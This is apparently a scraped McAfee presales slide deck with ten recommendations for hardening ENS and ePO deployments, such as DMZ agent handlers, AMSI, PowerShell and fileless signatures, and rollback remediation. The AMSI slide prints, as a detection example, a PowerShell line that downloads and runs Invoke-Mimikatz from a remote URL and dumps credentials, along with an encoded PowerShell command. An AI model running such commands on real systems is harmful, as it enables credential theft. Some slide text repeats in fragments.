mcafee 's top 10 endpoint optimization recommendations€¦ · sql port 1433 (ssl) agent handler...

McAfee CONFIDENTIAL

McAfee 's Top 10 endpoint optimization recommendations

Robert Lourenco – Regional presales specialist

2McAfee CONFIDENTIAL

Please note

While there are many variations of settings and configurations that will best suit different customers this document is to assist customers with frequently seen lack or misconfigurations of important protection controls. Assumptions are made that are the very least things like OAS is enabled, tamper protection and UI passwords are enabled and ENS is deployed.

This document is taken from experience with health checks at many customers and therefore does not include every possible recommended setting. For thorough investigations or checks of your environment against best practice or recommendations please seek to use McAfee professional services.


AGENDA

• Addressing work from home endpoint• ENS optimizations and configurations for better visibility or protection• ePO optimizations

Many customers running McAfee ePO and endpoint security have not made a few optimizations that will lead to a more secure environment with more visibility

4

Transition legacy datacenters to multi-cloud model for cost savings

and agility

Support Legacy Infrastructure and Application Services as

necessary

Support agile Dev Ops and Redesign critical business applications for the

cloud

Adopt Industrial IoT and leverage Data Analytics for more Business

Insights

Transition legacy IT Infrastructure supporting OT to the multi-cloud

enterprise Infrastructure

Risk and Resiliency Transformation Automation and efficacy

Enable flexibility in sharing and application use for maximum

productivity

Transition Office Services and Common Business Applications to

the cloud

Support a global, mobile workforce that enables productivity from the

office to the home to the hotel


productivity


the cloud



New ENS 10.7 features

Fileless detection & AMSI

Story Graph


productivity


the cloud



Increase Productivity and Innovation

Attract and Retain Talent

Increase sales and improve customer engagement


productivity


the cloud



Increased visibility and control

Work from home

New modelsSaaS/IaaS/PaaS

Support Legacy Infrastructure and Application Services as

necessary


productivity


the cloud



Increase Productivity and Innovation

Attract and Retain Talent

Increase sales and improve customer engagement


productivity


the cloud



Rollback remediation

ePO automations

ENS/TIE/ATD integrations and automation

Our customers value drivers

TransformationOrganizations are transforming with technology. Whether adopting the cloud, BYOD or IoT to transform the way they engage with customers, partners and/or employees, organizations bear risk as these technologies expand the attack surface. With McAfee, organizations can transform confidently leveraging security solutions purpose-built with transformation in mind, including those that secure every segment of the cloud and heterogenous device environments. And, we transform the nature of security itself with security-as-a-service consumption models.

Optimization 1: Addressing the work from home conundrum Endpoint visibility


Work from Home:Placing agent handlers in the DMZ

Benefits:

• Updated roaming users' policies and software

• Get roaming users' threat and client events

Positive results

• No VPN requirement

• WFH visibility


Baseline McAfee ePO Infrastructure with DMZ Agent handler

DMZ

McAfee® ePO™ Server

SQLMcAfee ePO

Console

Internet Agent Handler

DMZ Servers

SQL Port 1433 (SSL)

Agent Handler Port 443, 8443, 8444

Pull Software & UpdatesTCP Port 21/80 and 443

Laptops

Agent Port 443

Events UpstreamPolicies andClient Tasks down Port 443

MA 5.xPull Software & Updates Port 443

Internet

KEY POINTS

▪ Simple deployment

▪ Ease of management from a single console

▪ Ease of scalability

▪ Distributed definition updates

▪ Remote user support

Optimization 2: (TIE customers only)Addressing the work from home conundrum Remote TIE reputation capabilities


Work from Home:Placing DXL brokers in the DMZ (TIE customers)

Benefits:

• Run agent wake up calls to roaming users

• Apply DXL messages to roaming users

• Provide enterprise reputation protection from Threat intelligence exchange to roaming users

Positive results

• No VPN requirement

• WFH endpoint increased protection


Baseline McAfee® ePO™ Infrastructure with DMZ DXL broker

DMZ

McAfee®

ATD

McAfee® ePO™ Server

SQL

McAfee® TIE PrimaryDXL Broker

McAfee ePOConsole

Internet Agent Handler

DMZ Servers

DXL Broker

SQL Port 1433 (SSL)

Agent Handler Port 443, 8443, 8444

DXL Port 8883

MAPort 8081AH 443

Pull Software & UpdatesTCP Port 21/80 and 443

Laptops

DXLPort 8883+ ICMP

Events UpstreamPolicies andClient Tasks down Port 443

MA 5.xPull Software & Updates Port 443

DXL Port 8883+ 443

Internet

KEY POINTS

▪ Simple deployment

▪ Ease of management from a single console

▪ Ease of scalability

▪ Distributed definition updates

▪ Remote user support

Risk and ResiliencySecurity is about risk management. To fulfill this purpose, security professionals must speak the language of the boardroom. Yesterday’s security tools leave them blind to the risk, let alone able to communicate it. And, with regulations (like GDPR) upping the ante on the consequences of a breach, the stakes are getting higher. McAfee provides security solutions that offer visibility and control of data and assets across the attack surface, enabling organizations to meet compliance requirements, protect intellectual property and manage financial and reputational risk.

McAfee Confidentiality Language

ENS 10.7


For customers still have not upgraded to ENS 10.7

• Best performing ENS to date with all the additional features

• Most stable ENS release to date

• Multiple new enhancements

ENS | Detection Technology per Version

Endpoint Security Capabilities Summary

Detection Technology ENS 10.5.5 ENS 10.5.5 ENS 10.6.1 ENS 10.7

Threat Prevention l l l l

Adaptive Threat Prevention l l l

Signature & Heuristic Engine (convicting the majority of known malware) l l l l

Global Threat Intelligence (cloud-based reputation for some known malware detections & up-to-the-minute updates)

l l l l

Attack Surface Reduction (using Exploit Prevention rules) l l l l

Threat Intelligence Exchange (internal reputation source with unknown files automatically sent to ATD sandbox for analysis)

l l l

Process Containment (Dynamic Application Containment ) l l l

Static and Dynamic machine learning (Using Real Protect) l l l

File-based and fileless script attack signature detection (using Microsoft Anti-Malware Script Interface or AMSI)

l l

Attack Behavior Blocking (Using Adaptive Threat Prevention rules with Process Tree Knowledge)

l

File-based and fileless script attack machine learning detection (using Microsoft Anti-Malware Script Interface on Windows 10 and Windows 7 with PowerShell 5.0)

l

Roll-back of file and registry changes including encrypted files (using Enhanced Remediation)

l

Story Graph to illustrate the flow and activities associated with an attack, (from launch to conviction)

l


Optimization 3:

ENS AMSI

Have you enabled AMSI (Antimalware Scan interface)?

McAfee AMSI integration protects against malicious scripts. Scripts in vbscript or PowerShell can be obfuscated. With AMSI support ENS will de-obfuscate the scripts and ensure no malware is running and file-less malware can affect the system.

This setting may not be enabled by default or could be placed in observe mode only which will create events but not block the malicious scripts from running.

This setting can be found in the ENS ATP options policy under real protect scanning:

IEX (New-Object System.Net.Webclient).DownloadString(‘https://git.com/***/Invoke-Mimikatz.ps1’) ; Invoke-Mimikatz -DumpCreds

18

WithMcAfee FilelessThreat Protection

POWERSHELL.EXE -ENCODEDCOMMAND SQBGACGAJABQAFMAVGBLAFIAUWBJAAYG

McAfee with AMSI Support

CMD

Scripting Engine


Optimization 4:

ENS Exploit prevention –PowerShell signatures

Do you have PowerShell visibility or protection?McAfee ENS exploit prevention contains signatures for PowerShell monitoring and control.

This setting may not be enabled by default. At a minimum for visibility for endpoint and SOC teams enable important ones for reporting if not blocking. Visibility on encoded, hidden, policy bypass and many others are important for monitoring and detection of malware or malicious use of systems.

This setting can be found in the ENS exploit prevention policy under signatures


Optimization 5:

ENS Exploit prevention –Fileless signatures

Are Fileless signatures enabledMcAfee ENS exploit prevention contains signatures for Fileless threat monitoring and control.

This setting may not be enabled by default. At a minimum for visibility for endpoint and SOC teams enable important ones for reporting if not blocking. Visibility on fileless threats are important for monitoring and detection of malware or malicious use of systems.

This setting can be found in the ENS exploit prevention policy under signatures


Optimization 6:

ENS Exploit prevention –Network intrusion prevention

Can you see port scanning and other networkIntrusions between endpoints that don’t transverse network devices like IPS or FW’s?

This setting may not be enabled by default. ENS can detect network port scans and other network intrusions with the network intrusion prevention capabilities.

This setting can be found in the ENS exploit prevention policy Network Intrusion prevention


Optimization 7:

ENS – Ensure GTI is enabled

Is GTI enabled?

• Make sure GTI is enabledEnsure the systems can reach GTI through DNS. If the customer has split DNS architecture. Then they need to do some changes to benefit from GTI for the ENS TP

•https://kc.mcafee.com/corporate/index?page=content&id=KB53782

https://kc.mcafee.com/corporate/index?page=content&id=KB53782

Automation & EfficacySecurity is awash in complexity. Sophisticated attacks are increasing, the vendor landscape is too complex, too many security products operate in isolation and there are too few employees to address the challenge. McAfee addresses the need by giving customers the best of both worlds: an open approach that offers competitive choice while simplifying operations; a mix of threat and artificial intelligence to maximize efficacy and minimize false positives; and solutions that team humans with machines to address both the sophistication and volume of threats.


Optimization 8:

Effective client tasks

A Client deployment task should be created at the top level of the system tree and deployed to all systems that require protection.

A task to run immediately should be created to ensure as soon as a system has a McAfee agent deployed to it that it deploys ENS and ENS components automatically. This reduces the time systems are unprotected

A daily task should also be setup to ensure any systems that didn’t complete the immediate task for any reason will be caught by this daily task

Product Deployment & Maintenance

Situation

• When managing large numbers of systems within a complex environment, some of these systems will inevitably not be running the desired products and versions of software

Desired Outcome

• To maximise the numbers of systems running the desired products and versions of software

Product Deployment & Maintenance

The objective is to ensure Endpoint Security is installed and up to date from a product perspective, i.e.

• An endpoint is running the latest versions of each Endpoint Security module

• It is not concerned with content (Engine or DAT installed)

Detailed Objectives

1. Identify systems that are out of compliance

2. Configure easy identification of non-compliant systems within System Tree

3. Configure shorter reporting interval (ASCI) for non-compliant systems

4. For systems that do not have any version installed run a deployment task

5. For systems that have an out of date version run an update task

6. Remove identification and shorter reporting interval for compliant systems

Objectives & workflow

Use of tags with product deployment and maintenance

• Tags

• NO ENS: One or more ENS modules is not installed

• BAD ENS: One or more ENS modules is out of date

• Only one or other or neither should be applied at one time

Note use of simple short names – these can easily be viewed in the system tree.

Remember other tags may be present if automation is used extensively

• How to assign tags? Some considerations:

• Tag assignment should be automatic (admin should not need to assign tags)

• Tags removal should be automatic too (i.e. tags only present if condition is true)

• ENS consist of multiple modules, so multiple version checks are required, (e.g. Platform, Threat Prevention, Firewall, Web Control, Adaptive Threat Prevention)

• Process should be as simple as possible to maintain, (e.g. when a new version of ENS is released and version numbers of all modules need to change)


Optimization 9:

System tree sorting

System tree sorting

Situation

• When managing large numbers of systems within a complex environment, systems need to automatically move into the correct groups so they have the right policies applied for the type of system they are or location they presenting at.

Desired Outcome

• To ensure systems are always placed in the correct group to get the correct policies.

System tree sorting - configuration

First check server settings

• Under configuration → server setting → system tree sorting. To have systems sort on eachagent to server communication ensure its enabled

Check if systems have sorting enabled in the system tree• You may need to add the system tree sorting column

System tree sorting - configuration

Check if sorting is enabled on Active directory synchronization agent deployment

• Under System tree → group details → synchronization type → Push Agent →

And ensure sorting criteria is setup by IP or TAG. Systems will move to the correct groups based on IP or TAG or a combination of the 2.• Under System tree → group details → sorting criteria


Optimization 10:

ENS 10.7 – roll back

38McAfee Confidential

Rollback Remediation

How it works:

Automatically returns systems to a healthy state

Malware attempts to compromise an endpoint:

• Filenames altered• Executables are called on to

grant access to the system• Payload is delivered, system

is compromised

• System snapshot is established• Records changes made to files,

permission changes and other malicious actions

• ENS detects threats through known methods, behavioral analysis or global threat intelligence

• Rollback remediation is triggered by administrative policies

• System changes are reversed and system returns to a healthy state

Users remain productive, administrators regain time otherwise spent on manual repair or reimaging

39McAfee Confidential

ENS 10.7 ATP – Enable enhanced remediation

To enable roll back

• Under the ENS ATP policies → options → action enforcement

mcafee 's top 10 endpoint optimization recommendations€¦ · sql port 1433 (ssl) agent handler...

Documents